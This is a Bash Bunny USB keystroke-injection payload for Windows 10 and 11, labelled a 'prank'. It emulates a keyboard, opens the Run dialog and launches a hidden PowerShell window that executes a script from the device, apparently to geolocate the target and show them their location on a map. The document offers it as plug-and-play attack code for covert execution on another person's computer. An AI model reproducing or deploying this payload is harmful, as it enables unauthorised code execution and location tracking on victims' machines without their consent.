# Title:         We-Found-You
# Description:   This payload is meant to open a map in your targets web browser with their current location
# Author:        I am Jakoby
# Version:       1.0
# Category:      Prank
# Attackmodes:   HID, Storage
# Target:        Windows 10, 11

#     --------------------------------------------------------------------------------------
#     THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
#     --------------------------------------------------------------------------------------

LED SETUP

GET SWITCH_POSITION

ATTACKMODE HID STORAGE

LED STAGE1

QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\found-you.ps1')"
QUACK ENTER
